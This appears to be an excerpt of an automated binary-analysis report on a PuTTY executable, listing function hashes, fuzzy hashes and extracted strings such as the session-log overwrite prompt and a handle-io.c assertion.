                    • Opcode Fuzzy Hash: 77a0d4288ce43f6424c86afdb207ada4fa06927fe978a950bc793b7a921af69b
                    • Instruction Fuzzy Hash: F6F096F76043406BE7002AB1BC0BF2B76D8EB98769F040478F54DE6251E66A9518C763
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • %s Log to File, xrefs: 00BCED73
                    • The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging., xrefs: 00BCED5E
                    Similarity
                    • API ID: Message
                    • String ID: %s Log to File$The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging.
                    • API String ID: 2030045667-4035860868
                    • Opcode ID: 4ec9a70bf801087c66f529c6e72d0ae13ef267977af8e8364f2728103e2ea683
                    • Instruction ID: 0d8699b985cedfcdce585950edd3292355b826fc2895df0ba597817618e10d1c
                    • Opcode Fuzzy Hash: 4ec9a70bf801087c66f529c6e72d0ae13ef267977af8e8364f2728103e2ea683
                    • Instruction Fuzzy Hash: A8F0A7F7B007403BE60526B17C4BF6E36C8CB95765F040074F90A96282FA564918C663
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/handle-io.c, xrefs: 00C1619F
                    • h->type == HT_INPUT, xrefs: 00C161A4
                    Similarity
                    • API ID: Event
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/handle-io.c$h->type == HT_INPUT
                    • API String ID: 4201588131-1190648860
                    • Opcode ID: 7110f64193880d0cab8e6133da9bc133a9296afdc71965f5a7e40cf69ffe32cf
                    • Instruction ID: 4555ea26382089d4049f7687819103201ad78edd7194754e6eb2614b814399df
                    • Opcode Fuzzy Hash: 7110f64193880d0cab8e6133da9bc133a9296afdc71965f5a7e40cf69ffe32cf
                    • Instruction Fuzzy Hash: 27E09230808341BAE7318A24A80D3D97BF06B02319F18086DE8D6114E283B86AC8D782
                    Uniqueness

                    Uniqueness Score: -1.00%